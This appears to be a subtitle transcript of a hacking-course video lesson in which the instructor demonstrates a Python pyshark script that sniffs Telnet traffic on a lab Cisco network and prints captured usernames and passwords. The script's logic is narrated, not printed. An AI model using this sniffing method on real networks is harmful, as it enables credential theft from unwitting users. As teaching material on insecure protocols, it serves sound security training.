1
00:00:00,180 --> 00:00:00,450
Okay.

2
00:00:00,450 --> 00:00:06,150
So in this example, I've got a Telnet script that I've written, I'm going to import py shock.

3
00:00:06,150 --> 00:00:10,170
I'm going to capture traffic off the wire in real time on the saboteur.

4
00:00:10,230 --> 00:00:11,640
Host on Ethernet zero.

5
00:00:12,000 --> 00:00:15,630
I've got a loop once again looking for telnet traffic.

6
00:00:15,630 --> 00:00:18,240
So is it telnet in the packet?

7
00:00:18,660 --> 00:00:22,770
If it is, look for username in the string.

8
00:00:23,160 --> 00:00:26,550
In other words, look for username in the output of the packet.

9
00:00:27,000 --> 00:00:30,120
If you see username, print the username.

10
00:00:30,480 --> 00:00:33,570
If you see password then print the password.

11
00:00:33,570 --> 00:00:41,340
Now telnet isn't as nice as the other protocols and that's because the username and password are sent

12
00:00:41,820 --> 00:00:43,290
in individual packets.

13
00:00:43,290 --> 00:00:49,800
So we're not going to see everything as clearly as we saw with the other scripts, but that's not going

14
00:00:49,800 --> 00:00:50,340
to stop us.

15
00:00:50,340 --> 00:00:53,070
We'll still be able to capture the username and password.

16
00:00:53,460 --> 00:01:00,150
So again, cat telnet p y there's our script.

17
00:01:01,710 --> 00:01:06,000
Let's run Python to capture the username and password.

18
00:01:06,000 --> 00:01:10,710
What I'll do in this example is use ubuntu two to telnet to the router.

19
00:01:11,610 --> 00:01:14,790
So there's a boon to one which is our hacking server.

20
00:01:14,940 --> 00:01:19,950
Here is a bunch of two router IP address.

21
00:01:20,720 --> 00:01:25,730
Is 1921681 2282.

22
00:01:26,490 --> 00:01:31,140
So telnet 1921681 2282.

23
00:01:31,470 --> 00:01:34,140
Notice we suddenly see some output here.

24
00:01:35,620 --> 00:01:38,080
So it's seeing something.

25
00:01:38,350 --> 00:01:40,450
It's captured this thing called password.

26
00:01:41,290 --> 00:01:42,610
Put the password in.

27
00:01:42,970 --> 00:01:45,640
Don't if you saw that notice.

28
00:01:46,090 --> 00:01:47,210
See, I.

29
00:01:47,260 --> 00:01:48,090
Esko.

30
00:01:48,130 --> 00:01:49,960
There's the Telnet password.

31
00:01:51,110 --> 00:01:56,180
There's a prompt tap enable password.

32
00:01:56,210 --> 00:02:00,080
There's the enabled password, Cisco.

33
00:02:01,720 --> 00:02:02,590
Show Run.

34
00:02:04,060 --> 00:02:06,220
We can see the running config here.

35
00:02:06,610 --> 00:02:14,800
Now again, Telnet doesn't do this very nicely because the data is all over the place.

36
00:02:14,800 --> 00:02:20,800
So I've kind of tried to highlight here that you must look for password after you see this line.

37
00:02:21,760 --> 00:02:28,990
So let's change the the way the Cisco router works.

38
00:02:28,990 --> 00:02:31,540
I'll say username David password, Cisco.

39
00:02:31,570 --> 00:02:37,600
And rather than just using a standard password, I'll say login local.

40
00:02:37,600 --> 00:02:41,050
So a username and password are used when I tell it to the writer.

41
00:02:41,990 --> 00:02:42,260
Okay.

42
00:02:42,260 --> 00:02:45,020
So let me go to the end here.

43
00:02:45,740 --> 00:02:46,850
Tell it to the writer.

44
00:02:46,880 --> 00:02:48,620
Notice we see username.

45
00:02:48,620 --> 00:02:51,380
So we told be careful your username is going to be displayed now.

46
00:02:52,400 --> 00:02:53,090
David.

47
00:02:54,260 --> 00:02:57,650
There you can see the username.

48
00:02:57,830 --> 00:02:58,760
David.

49
00:02:59,180 --> 00:03:04,190
Now it gets copied twice because we're seeing the traffic from the PC to the router and from the router

50
00:03:04,190 --> 00:03:06,470
to the PC password.

51
00:03:06,470 --> 00:03:07,370
Cisco.

52
00:03:08,330 --> 00:03:09,050
You can see that.

53
00:03:09,050 --> 00:03:11,150
Yes, Cisco is the password.

54
00:03:11,570 --> 00:03:16,670
It was only sent once because we don't see the password in the output here.

55
00:03:18,970 --> 00:03:20,020
Top enable.

56
00:03:20,500 --> 00:03:23,410
We can see that there there's enable.

57
00:03:24,580 --> 00:03:28,480
Notice we are warned another password is going to be displayed here.

58
00:03:28,900 --> 00:03:30,460
So I'll put the password in.

59
00:03:30,490 --> 00:03:32,110
There's our password of Cisco.

60
00:03:32,500 --> 00:03:39,370
So again, Telnet isn't as good as OSPF or FTP or other protocols when it comes to capturing traffic.

61
00:03:39,730 --> 00:03:46,780
It's a bit all over the place, but you could save this to a file and then simply do a search for a

62
00:03:46,780 --> 00:03:53,020
keyword like I've done here, a bunch of lines and password, and then you know that the password is

63
00:03:53,020 --> 00:03:54,130
just off to that.

64
00:03:54,190 --> 00:04:01,300
Or you could do a search for the actual keyword password and see the passwords in the text just after

65
00:04:01,300 --> 00:04:01,630
that.

66
00:04:01,630 --> 00:04:08,110
So there is my positive Cisco notice as an example, if we tap show run here, we'll see the actual

67
00:04:08,110 --> 00:04:10,780
password in the output here like this.

68
00:04:12,850 --> 00:04:16,959
And if I scroll down, I'll see.

69
00:04:18,550 --> 00:04:19,870
The passport over here.

70
00:04:20,320 --> 00:04:22,050
Okay, so, telnet, isn't that great?

71
00:04:22,089 --> 00:04:28,510
Not that easy to do it as cleanly as the other protocols.

72
00:04:28,510 --> 00:04:31,750
But there's my basic python script.

73
00:04:32,490 --> 00:04:36,630
And again, in this example, I'm using sublime text.

74
00:04:36,660 --> 00:04:37,780
Nice idea.

75
00:04:37,860 --> 00:04:40,290
There are many others out there that are very good.

76
00:04:40,560 --> 00:04:44,670
You can see that the script looks a lot nicer in sublime text.

77
00:04:44,700 --> 00:04:46,020
Yes, my OSPF script.

78
00:04:46,020 --> 00:04:47,460
It's only a few lines.

79
00:04:48,830 --> 00:04:50,390
Here's my FTP script.

80
00:04:50,780 --> 00:04:53,060
Here's my Telnet script.

81
00:04:53,510 --> 00:04:58,340
You could take these scripts and change them and make them a lot more powerful.

82
00:04:58,460 --> 00:05:03,410
I just wanted to show you a little bit about what Python can be used for and inspire you to think about

83
00:05:03,410 --> 00:05:05,000
the options available to you.

84
00:05:05,540 --> 00:05:08,210
Download these scripts and see what you can do with them.

85
00:05:08,240 --> 00:05:10,010
As always, be careful.

86
00:05:10,040 --> 00:05:11,570
Hacking Networks.

87
00:05:11,570 --> 00:05:16,880
Make sure that you have permission to hack those networks or to grab usernames and passwords off those

88
00:05:16,880 --> 00:05:17,660
networks.